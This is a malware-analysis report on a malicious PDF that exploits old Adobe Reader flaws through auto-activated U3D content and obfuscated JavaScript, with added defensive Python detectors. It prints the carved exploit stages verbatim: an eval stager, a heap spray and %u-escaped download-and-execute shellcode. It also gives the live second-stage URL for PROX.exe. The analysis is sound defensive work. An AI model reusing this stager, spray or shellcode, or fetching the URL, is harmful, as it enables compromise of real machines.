Verdict: MALICIOUS
Risk score: 510

Malware Insights

MITRE ATT&CK
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
The PDF fires multiple critical heuristics indicating exploitation of Adobe Reader vulnerabilities, specifically CVE-2009-3459 and CVE-2007-5659, through embedded JavaScript whose payload is gated on the Reader version. The JavaScript carries shellcode that downloads a second-stage executable from http://udefapcumlc.com/nte/PROX.exe/yH9702b368V0100f060006R87006a76102Tdb01d832203l000c. The auto-activated U3D content and the CVE-specific version gates in the JavaScript further support this attack pattern.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (13)
- Adobe Reader U3D auto-activated 3D annotation — CVE-2009-3459 (critical; CVE likely; rule CVE_2009_3459_U3D_AUTOACTIVATE): PDF contains a /Subtype /3D annotation configured to auto-activate on page view (/3DA <</A /PV /AIS /I>>) alongside a /U3D stream and JavaScript. This is the document shape associated with CVE-2009-3459 (Adobe Reader heap-based buffer overflow patched in APSB09-15 and exploited in the wild in October 2009): the U3D parser runs without any user interaction as soon as the page is rendered, while the accompanying JavaScript heap-sprays so that controlled memory sits where the corrupted allocation points.
- Collab.collectEmailInfo — CVE-2007-5659 (critical; CVE exact; rule CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo(). CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(), one of a series of Acrobat JavaScript API exploits. Identified after JavaScript deobfuscation.
- Adobe Reader U3D CLODProgressiveMeshDeclaration exploit (critical; CVE likely; rule CVE_2009_3953): PDF combines malformed U3D 3D content with JavaScript/action activation. CVE-2009-3953 is an Adobe Reader/Acrobat U3D CLODProgressiveMeshDeclaration array-boundary vulnerability triggered by malformed U3D data in a PDF.
- U3D/3D content in PDF — Adobe Reader 3D parser CVE-family indicator (high; rule PDF_U3D_CVE_RELATED): PDF contains U3D (Universal 3D) or 3D annotation content. CVE-2011-2462 and CVE-2009-3953 are critical vulnerabilities in Adobe Reader's U3D processing that allow arbitrary code execution; U3D content is extremely rare in ordinary documents.
- JavaScript action (low; 4 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Adobe Reader APSB09-15 patch-range version gate for CVE-2009-3459 (high; CVE likely; rule PDF_JS_ADOBE_APSB09_15_PATCH_GATE): PDF JavaScript gates the exploit payload on an Adobe Reader version range that exactly matches the APSB09-15 patch boundary (< 9.2, < 8.1.7, < 7.1.4). That boundary fingerprints the vulnerabilities fixed in APSB09-15 (CVE-2009-2990, CVE-2009-3459); no benign script tests all three Reader version points together.
- Adobe Reader APSB08-13 patch-range version gate for CVE-2007-5659 (high; CVE likely; rule PDF_JS_ADOBE_APSB08_13_PATCH_GATE): PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1), the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
- PDF JavaScript shellcode contains an embedded download URL (high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL): Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute routine (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- ClamAV: Pdf.Dropper.Agent-7142682-0 (critical; rule CLAMAV_DETECTION): ClamAV detected this file as malware: Pdf.Dropper.Agent-7142682-0.
- Annotation subject percent-decoding eval stager (critical; rule PDF_ANNOT_SUBJECT_MARKER_EVAL_STAGER): OpenAction JavaScript forces annotation enumeration, reads an annotation /Subject payload with getAnnots(), rewrites marker bytes into percent escapes, decodes the result with unescape() and dispatches it through eval(). This is a high-confidence exploit-kit staging pattern. It is intentionally not mapped to CVE-2009-1492 unless the getAnnots() call itself carries the crafted integer or long-argument shape of that vulnerability.
- Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://udefapcumlc.com/nte/PROX.exe/yH9702b368V0100f060006R87006a76102Tdb01d832203l000c (referenced by PDF JavaScript)
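The two U3D findings above (CVE_2009_3459_U3D_AUTOACTIVATE and PDF_U3D_CVE_RELATED) describe a document shape rather than a byte signature. The Python below is an added example, not the analyzer's code: it scans PDF bytes for a /3D annotation whose /3DA activation dictionary fires on page open (/PO) or page view (/PV) instead of waiting for a click (/XA), for a /U3D stream, and for JavaScript, after resolving the PDF name hex escapes (/Sub#74ype) that kits use to dodge byte-level rules. The PDF it runs on is a constructed minimal file, not the sample. Caveat: it inspects uncompressed bytes only; inflate FlateDecode streams and object streams before scanning, because real samples usually keep their dictionaries there.

```python
import re

# Constructed minimal PDF (not the sample's bytes) with the shape the rule describes:
# a /3D annotation whose /3DA activation dictionary fires on page view (/A /PV),
# a /U3D 3D stream, and document-level JavaScript reached via /OpenAction.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /3D /Rect [0 0 100 100] /3DD 6 0 R
   /3DA << /A /PV /AIS /I >> >> endobj
5 0 obj << /S /JavaScript /JS 7 0 R >> endobj
6 0 obj << /Type /3D /Subtype /U3D /Length 4 >> stream
U3D!
endstream endobj
7 0 obj << /Length 12 >> stream
app.alert(1)
endstream endobj
trailer << /Root 1 0 R >>
"""

# /3DA /A values (PDF 1.7, 3D activation dictionary): /PO = page open, /PV = page
# visible, /XA = explicit user action (the default). The first two need no click.
AUTO_ACTIVATE = {b"PO", b"PV"}

RE_NAME_HEX = re.compile(rb"#([0-9A-Fa-f]{2})")
RE_3D_ANNOT = re.compile(rb"/Subtype\s*/3D\b")
RE_3DA_MODE = re.compile(rb"/3DA\s*<<[^>]*?/A\s*/(PO|PV|XA)\b")
RE_U3D = re.compile(rb"/Subtype\s*/U3D\b")
RE_JS = re.compile(rb"/(JavaScript|JS)\b")


def normalize_names(data: bytes) -> bytes:
    """Resolve PDF name hex escapes (/Sub#74ype -> /Subtype) so a kit cannot hide
    the /3D or /JavaScript names from a byte-level scan."""
    return RE_NAME_HEX.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def triage_3d_pdf(data: bytes) -> dict:
    """Collect the indicators that make up the auto-activated U3D + JS document shape."""
    data = normalize_names(data)
    modes = [m.group(1) for m in RE_3DA_MODE.finditer(data)]
    return {
        "has_3d_annot": bool(RE_3D_ANNOT.search(data)),
        "activation_modes": [m.decode() for m in modes],
        "auto_activates": any(m in AUTO_ACTIVATE for m in modes),
        "has_u3d_stream": bool(RE_U3D.search(data)),
        "has_javascript": bool(RE_JS.search(data)),
    }


def is_suspicious_3d_shape(data: bytes) -> bool:
    """True when 3D content activates without a click and JavaScript is present:
    that combination is the rule's trigger and is almost never seen in benign files."""
    t = triage_3d_pdf(data)
    return (t["has_3d_annot"] and t["auto_activates"]
            and t["has_u3d_stream"] and t["has_javascript"])


if __name__ == "__main__":
    print(triage_3d_pdf(SAMPLE_PDF))
    print("suspicious:", is_suspicious_3d_shape(SAMPLE_PDF))
```

Run it over every decompressed object of a suspect file; a /3D annotation that activates with /XA and no JavaScript is an ordinary engineering drawing, while /PV or /PO plus a script is the shape worth detonating.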
Extracted artifacts (4)
Files carved from inside the sample during analysis.

Artifact 1: javascript_obj0007_000.js
SHA-256: bedd676af9bf2e3ca07f9e3a10d07bc561e9745801f30653ef176c0c1e7620a3
Kind: pdf-javascript-stream
Source: PDF /JS object 7 at offset 0x1A4
Size: 336 bytes
Preview script (first 1,000 lines of the extracted script):
if (1) {var z; var y; em = ''; r = (r = 'l' + 'a' + em + 'ce', 'rep' + r); th = event.target; z = y = th;
y = 0; z['syncAn'+'notS'+'can'] ( ); y = z;var p = y['g'+'et'+'Annots']( { nPage: 0 }) ;var s = p[0].subject;var l = s[r](/k /g, 'q%p'[r](/[qp]/g, ''));s = th['unes' + 'cape'] (l) ;var e = th[em + 'e'+ em + 'v'+'al']; e(s);}
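The stager above is short enough to read by hand, but the same concatenation tricks recur through the kit's later stages, so it is worth normalising mechanically. The Python below is an added example, not the analyzer's or the kit's code: it inlines the empty-string variable (em), folds 'a' + 'b' string concatenations with a quote-aware tokenizer, rewrites obj['name'] into obj.name, and then checks for the five API names the PDF_ANNOT_SUBJECT_MARKER_EVAL_STAGER rule keys on. It also replays the subject decode (marker "k " to "%", then unescape) on a constructed /Subject value, since the real payload is not reproduced in this report. The comma-expression alias r = 'replace' is left for the reader; resolving it needs evaluation rather than rewriting.

```python
import re
from urllib.parse import unquote

# The stager as quoted in the report's first extracted artifact (javascript_obj0007_000.js).
STAGER = r"""if (1) {var z; var y; em = ''; r = (r = 'l' + 'a' + em + 'ce', 'rep' + r); th = event.target; z = y = th;
y = 0; z['syncAn'+'notS'+'can'] ( ); y = z;var p = y['g'+'et'+'Annots']( { nPage: 0 }) ;var s = p[0].subject;var l = s[r](/k /g, 'q%p'[r](/[qp]/g, ''));s = th['unes' + 'cape'] (l) ;var e = th[em + 'e'+ em + 'v'+'al']; e(s);}"""

# Constructed stand-in for the annotation /Subject payload (the real one is not in
# the report). The stager rewrites the marker "k " to "%", so "k 61" becomes "%61",
# which unescape() turns into "a".
SUBJECT = "k 61k 70k 70k 2Ek 61k 6Ck 65k 72k 74k 28k 31k 29k 3B"   # app.alert(1);

RE_EMPTY_DEF = re.compile(r"\b([A-Za-z_$][\w$]*)\s*=\s*''\s*;")
RE_TOKEN = re.compile(r"""'(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*"|[^'"]+""")
RE_PLUS = re.compile(r"\s*\+\s*")
RE_BRACKET = re.compile(r"""\[\s*(['"])([A-Za-z_$][\w$]*)\1\s*\]""")


def inline_empty_strings(src: str) -> str:
    """Replace uses of variables assigned '' (here: em) with a literal ''."""
    for name in set(RE_EMPTY_DEF.findall(src)):
        src = re.sub(rf"\b{re.escape(name)}\b(?!\s*=[^=])", "''", src)
    return src


def _is_string(tok: str) -> bool:
    return len(tok) >= 2 and tok[0] in "'\"" and tok[-1] == tok[0]


def collapse_concats(src: str) -> str:
    """Fold 'a' + 'b' + 'c' into 'abc'. Strings are tokenised left to right so quotes
    pair correctly; a regex over the whole file would mis-pair them."""
    out = []
    for tok in RE_TOKEN.findall(src):
        if (len(out) >= 2 and _is_string(tok) and _is_string(out[-2])
                and out[-2][0] == tok[0] and RE_PLUS.fullmatch(out[-1])):
            out.pop()                       # the '+'
            left = out.pop()
            tok = left[:-1] + tok[1:]       # 'ab' + 'c' -> 'abc'
        out.append(tok)
    return "".join(out)


def bracket_to_dot(src: str) -> str:
    """obj['getAnnots'] -> obj.getAnnots once the name is a plain literal."""
    return RE_BRACKET.sub(r".\2", src)


def normalize(src: str) -> str:
    return bracket_to_dot(collapse_concats(inline_empty_strings(src)))


STAGER_APIS = ("syncAnnotScan", "getAnnots", "subject", "unescape", "eval")


def stager_indicators(src: str) -> list:
    """Which of the rule's five API names survive normalisation as member accesses."""
    norm = normalize(src)
    return [api for api in STAGER_APIS if re.search(r"\." + api + r"\b", norm)]


def decode_marker_subject(subject: str, marker: str = "k ") -> str:
    """Replay the stager's decode: marker -> '%', then JS-style unescape of %XX.
    latin-1 keeps each %XX as one code unit, as Acrobat's unescape does;
    %uXXXX escapes are not handled here (this subject uses none)."""
    return unquote(subject.replace(marker, "%"), encoding="latin-1")


if __name__ == "__main__":
    print(normalize(STAGER))
    print("indicators:", stager_indicators(STAGER))
    print("decoded subject:", decode_marker_subject(SUBJECT))
```

After normalisation the call chain reads z.syncAnnotScan(), y.getAnnots({nPage: 0}), p[0].subject, th.unescape(l), th.eval(s), which is exactly the sequence the rule describes; on a real sample, feed the decoded subject back through the same normaliser, since the second stage is obfuscated the same way.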

Artifact 2: legacy_pdfkit_stage_000.js
SHA-256: eb902ec71d84e9f32f99e18aaf62a423111d76f5246470a2a882c8a69a57a9d7
Kind: deobfuscated-js
Source: repeated-marker hex decoded JavaScript at offset 0x2F3
Size: 13400 bytes
Detection: ClamAV found no threats. Obfuscation or payload: likely (the carved artifact contains 1 long base64-like blob).
Preview script (first 1,000 lines of the extracted script):
function y_x_1__ylMu(Tn0j___XP76gks, E74k__lJ_g_bU_V){ var O2__0_lyg458_f = 'um' + 'en' + "ts";O2__0_lyg458_f = 'a' + 'rg' + O2__0_lyg458_f;var wd4Wb__s1E_ebv = y_x_1__ylMu[O2__0_lyg458_f]["c" + "a" + "zzee"['r'+'epl'+'ace'](/zz/, 'll')];wd4Wb__s1E_ebv = wd4Wb__s1E_ebv["t"+"oS"+"t"+"r"+"ing"]();var bVVow8y__iO5__r = 0;try {if (app) {bVVow8y__iO5__r++;bVVow8y__iO5__r++;}} catch(e) { }var QUe5y__e1S = new Array();if (Tn0j___XP76gks) { QUe5y__e1S = Tn0j___XP76gks;} else {var q6eMtD7i2jOv_G = 0;var YjTvNVluFMp_y = 0;var ey02YR__bSUQ = 512;var UiI4_2__BkaX2AT = 52;UiI4_2__BkaX2AT = UiI4_2__BkaX2AT - 4;var O3M4n_L1c = UiI4_2__BkaX2AT + 9;while(YjTvNVluFMp_y < wd4Wb__s1E_ebv.length) {var t_d71_yAy54m2_1 = 1;var e5_84g5s = wd4Wb__s1E_ebv['c'+'h'+'arC'+'odeAt'](YjTvNVluFMp_y);if (e5_84g5s <= O3M4n_L1c && e5_84g5s >= UiI4_2__BkaX2AT) {if (q6eMtD7i2jOv_G == 4) { q6eMtD7i2jOv_G = 0; }if (isNaN(QUe5y__e1S[q6eMtD7i2jOv_G])) {QUe5y__e1S[q6eMtD7i2jOv_G] = 0;}QUe5y__e1S[q6eMtD7i2jOv_G] += e5_84g5s;if (QUe5y__e1S[q6eMtD7i2jOv_G] > 512) {QUe5y__e1S[q6eMtD7i2jOv_G] -= ey02YR__bSUQ;}q6eMtD7i2jOv_G++;}YjTvNVluFMp_y++;}}q6eMtD7i2jOv_G = 4;for (var rnbI3k = 0; rnbI3k < 4; rnbI3k++) {if (QUe5y__e1S[rnbI3k] > 256) {QUe5y__e1S[rnbI3k] -= 256;}}var sB_QA2Jv3__e = 0;var CY585psdkI6 = "";var NVvw4_BINk = 0;var b_AU4G = 0;var o1NQ0vn_Buq;var J4BUAQ_S___2 = 0;while(NVvw4_BINk < E74k__lJ_g_bU_V.length) {var iq_eH2f08l__j = E74k__lJ_g_bU_V.substr(NVvw4_BINk, 1) + "Z";var mR3__m__0__hCR = parseInt(iq_eH2f08l__j, 16);if (b_AU4G) {o1NQ0vn_Buq += mR3__m__0__hCR;if (sB_QA2Jv3__e == 4) {sB_QA2Jv3__e -= 4;}var Th52355tT_m = o1NQ0vn_Buq;Th52355tT_m = Th52355tT_m - (1 + J4BUAQ_S___2 + 1) * QUe5y__e1S[sB_QA2Jv3__e];if (Th52355tT_m < 0) { var F_nQgkO = 256;Th52355tT_m = Th52355tT_m - Math['floor'](Th52355tT_m / F_nQgkO) * 256;}Th52355tT_m = String['from' + 'CharCode'](Th52355tT_m);if (bVVow8y__iO5__r == 2) {CY585psdkI6 += Th52355tT_m;} else if (bVVow8y__iO5__r == 1) {CY585psdkI6 += mR3__m__0__hCR;} else 
{CY585psdkI6 += NVvw4_BINk;}sB_QA2Jv3__e++;b_AU4G = 0;J4BUAQ_S___2++;} else {b_AU4G = 1;o1NQ0vn_Buq = mR3__m__0__hCR * 16;}NVvw4_BINk++;};var abcd=0; ;var Qi7_2AQu = this;Qi7_2AQu['ev'+'al'](CY585psdkI6);}
y_x_1__ylMu
... (truncated)

Artifact 3: legacy_pdfkit_stage_001.js
SHA-256: 0c21043e91b23ccf522e87be33f818c9a4d81236abcc2e8cf7e309ce168228cc
Kind: deobfuscated-js
Source: repeated-marker hex decoded JavaScript at offset 0x2F3
Size: 5579 bytes
Detection: ClamAV found no threats. Obfuscation or payload: likely (the carved artifact contains 5 eval/decoder/string-building tokens).
Preview script (first 1,000 lines of the extracted script):
var JH__1He_6E4oU_w = new Array();var C3LB_Xp = 0;var xy_I__OJMp = "";function PomSj68_3_4Hy(l6F002nE0, F26q7_1jv_Q_r){var sWQ6bd = F26q7_1jv_Q_r.toString();var t_2a___Y44 = "";for(var i60r__Ig8uI = 0; i60r__Ig8uI < sWQ6bd.length; i60r__Ig8uI++) {var J_h_my = parseInt(sWQ6bd.substr(i60r__Ig8uI, 1));if (!isNaN(J_h_my)) {J_h_my = J_h_my.toString(16);if (J_h_my.length == 1) { J_h_my = "0" + J_h_my; }else if (J_h_my.length != 2) { J_h_my = "00"; }t_2a___Y44 = J_h_my + t_2a___Y44;}}while(t_2a___Y44.length < 8) { t_2a___Y44 = "0" + t_2a___Y44; }var x___FENBKB7_4sb = l6F002nE0.toString(16);if (x___FENBKB7_4sb.length == 1) { x___FENBKB7_4sb = "0" + x___FENBKB7_4sb; }else if (x___FENBKB7_4sb.length != 2) { x___FENBKB7_4sb = "00"; }t_2a___Y44 = "3" + x___FENBKB7_4sb + "P" + t_2a___Y44;return t_2a___Y44;}function T_1L2_H_6pmn2l(lhWr_T1l, AC6vW_Wo_X5){var HcX_jM7q__ugMt = new Array("");var w6m_BBf_2L_B73 = lhWr_T1l;var O7mr_i_1E_Sx;if ((O7mr_i_1E_Sx = lhWr_T1l.lastIndexOf("%u00")) != -1) {if (O7mr_i_1E_Sx + 6 == lhWr_T1l.length) {HcX_jM7q__ugMt[0] = lhWr_T1l.substr(O7mr_i_1E_Sx + 4, 2);w6m_BBf_2L_B73 = lhWr_T1l.substring(0, O7mr_i_1E_Sx);}}O7mr_i_1E_Sx = 1;for (i60r__Ig8uI = 0; i60r__Ig8uI < AC6vW_Wo_X5.length; i60r__Ig8uI++) {var y_QD_633Rg = AC6vW_Wo_X5.charCodeAt(i60r__Ig8uI).toString(16);if (y_QD_633Rg.length == 1) { y_QD_633Rg = "0" + y_QD_633Rg; }HcX_jM7q__ugMt[O7mr_i_1E_Sx] = y_QD_633Rg;O7mr_i_1E_Sx++;}i60r__Ig8uI = HcX_jM7q__ugMt[0].length ? 
0 : 1;HcX_jM7q__ugMt[O7mr_i_1E_Sx] = "00";HcX_jM7q__ugMt[O7mr_i_1E_Sx + 1] = "00";O7mr_i_1E_Sx += 2;if ((HcX_jM7q__ugMt.length - i60r__Ig8uI) % 2) {HcX_jM7q__ugMt[O7mr_i_1E_Sx] = "00";}while(i60r__Ig8uI < HcX_jM7q__ugMt.length) {w6m_BBf_2L_B73 += "%u" + HcX_jM7q__ugMt[i60r__Ig8uI + 1] + HcX_jM7q__ugMt[i60r__Ig8uI];i60r__Ig8uI += 2;}w6m_BBf_2L_B73 += "%u0000";return w6m_BBf_2L_B73;}function i8rnL_1_C2oW(X_ti_uk, P8fP7nT__t1){while (X_ti_uk.length*2<P8fP7nT__t1) {X_ti_uk += X_ti_uk;}X_ti_uk = X_ti_uk.substring(0,P8fP7nT__t1/2);return X_ti_uk;}function kdhgy8s_UJFn(VHbEM7_3, t_8_s80X3A, Xr__lV83__qGn_l){var fA28Hn_m = 0x0c0c0c0c;var X_ti_uk = unescape(t_8_s80X3A);var AC6vW_Wo_X5 = PomSj68_3_4Hy(VHbEM7_3, Xr__lV83__qGn_l);var fs_h__Ch8 = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var lhWr_T1l = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u15e9%u0001%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u00a9%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0093%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u10ec%u0001%u8b00%u83dc%u0cc3%u5251%u6853%u0104%u0000%u56ff%u5a0c%u5159%u8b52%u5302%u8043%u003b%ufa75%u7b81%u2efc%u6c64%u756c%u8303%u08eb%u0389%u43c7%u2e04%u6c64%uc66c%u0843%u5b00%uc18a%u3004%u4588%u3300%u50c0%u5350%u5057%u56ff%u8310%u00f8%u1d75%u016a%ueb83%uc70c%u7203%u6765%uc773%u0443%u7276%u3233%u43c7%u2008%u732d%u5320%u56ff%u5a04%u8359%u04c2%u8041%u003a%u9d75%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%ue6e8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4470%u4a4c%u006e%u7468%u7074%u2f3a%u752f%u6564%u6166%u63
70%u6d75%u636c%u632e%u6d6f%u6e2f%u6574%u502f%u4f52%u2e58%u7865%u2f65%u4879%u3739%u3230%u3362%u3836%u3056%u3031%u6630%u3630%u3030%u3630%u3852%u3037%u3630%u3761%u3136%u3230%u6454%u3062%u6431%u3338%u3232%u3330%u306c%u3030%u0063";app.P_4_s_4 = unescape(T_1L2_H_6pmn2l(lhWr_T1l, AC6vW_Wo_X5));var W11rj22ryWmeVIW = 0x400000;var pH0_o6_S_2nu = fs_h__Ch8.length * 2;var P8fP7nT__t1 = W11rj22ryWmeVIW - (pH0_o6_S_2nu+0x38);X_ti_uk = i8rnL_1_C2oW(X_ti_uk, P8fP7nT__t1);var N6__5M68__cO = (fA28Hn_m - 0x400000)/W11rj22ryWmeVIW;for (var F05DaoC_lg = 0; F05DaoC_lg < N6__5M68__cO; F05DaoC_lg++) {JH__1He_6E4oU_w[F05DaoC_lg] = X_ti_uk + fs_h__Ch8;
... (truncated)
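The PDF_JS_SHELLCODE_DOWNLOAD_URL finding and the shellcode string in this artifact carry the second-stage URL as little-endian %uXXXX escapes, and the same string holds the library name the stub loads. The Python below is an added analysis example, not part of the report or the kit: it unescapes the code units into the byte order Acrobat stores them in, carves http(s) URLs from the result, and reassembles strings that the stub builds on the stack with runs of x86 push imm32 (opcode 0x68) instructions. Its input is two excerpts of the shellcode string quoted above, joined; the "%u63" / "70" split in the page's dump is an extraction line break and is rejoined here as %u6370. The rest of the shellcode is left out.

```python
import re

# Two excerpts of the %u-escaped shellcode string quoted in this artifact, joined:
# the stub that pushes the "urlmon" library name onto the stack, and the tail that
# carries the second-stage URL. The remainder of the shellcode is omitted.
SHELLCODE_EXCERPT = (
    "%u046a%ue859%u00a9%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16"
    "%u365b%u2f1a%u4470%u4a4c%u006e%u7468%u7074%u2f3a%u752f%u6564%u6166%u6370"
    "%u6d75%u636c%u632e%u6d6f%u6e2f%u6574%u502f%u4f52%u2e58%u7865%u2f65%u4879"
    "%u3739%u3230%u3362%u3836%u3056%u3031%u6630%u3630%u3030%u3630%u3852%u3037"
    "%u3630%u3761%u3136%u3230%u6454%u3062%u6431%u3338%u3232%u3330%u306c%u3030"
    "%u0063"
)

RE_UESC = re.compile(r"%u([0-9A-Fa-f]{4})")
RE_URL = re.compile(rb"https?://[\x21-\x7e]+")
# x86 push imm32 is opcode 0x68 followed by four immediate bytes. Shellcode builds
# a string on the stack with a run of these; the last push holds its first bytes.
RE_PUSH_RUN = re.compile(rb"(?:\x68[\x00-\xff]{4}){2,}")


def uescape_to_bytes(s: str) -> bytes:
    """Unescape %uXXXX into 16-bit code units and lay them out as Acrobat does in
    memory: each unit becomes two little-endian bytes."""
    out = bytearray()
    for m in RE_UESC.finditer(s):
        out += int(m.group(1), 16).to_bytes(2, "little")
    return bytes(out)


def extract_urls(blob: bytes) -> list:
    """Carve printable http(s) URLs; the trailing %u0063 -> 'c\\0' ends the match."""
    return [m.group(0).decode("ascii") for m in RE_URL.finditer(blob)]


def pushed_strings(blob: bytes) -> list:
    """Reassemble printable strings built by consecutive push imm32 instructions."""
    found = []
    for m in RE_PUSH_RUN.finditer(blob):
        run = m.group(0)
        chunks = [run[i + 1:i + 5] for i in range(0, len(run), 5)]
        text = b"".join(reversed(chunks)).rstrip(b"\x00")
        if len(text) >= 4 and all(0x20 <= b < 0x7f for b in text):
            found.append(text.decode("ascii"))
    return found


if __name__ == "__main__":
    blob = uescape_to_bytes(SHELLCODE_EXCERPT)
    print("urls:", extract_urls(blob))
    print("stack strings:", pushed_strings(blob))
```

The decoded bytes give the URL the report lists under EMBEDDED_URL and the string "urlmon", which is the download-and-execute dependency the PDF_JS_SHELLCODE_DOWNLOAD_URL rule refers to; the push-run heuristic needs at least two consecutive pushes, so the lone 0x68 byte that begins "http" is not mistaken for one.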

Artifact 4: u3d_00_off000038ca.bin
SHA-256: db166b7bf539ceb527a321927dc7262838bbe91b146a4aa26884d46ee5696f20
Kind: pdf-3d-stream
Source: PDF U3D 3D stream at offset 0x38CA
Size: 27443 bytes
Detection: ClamAV found no threats. Obfuscation or payload: likely (carved artifact entropy is 7.99, consistent with packed or encrypted content).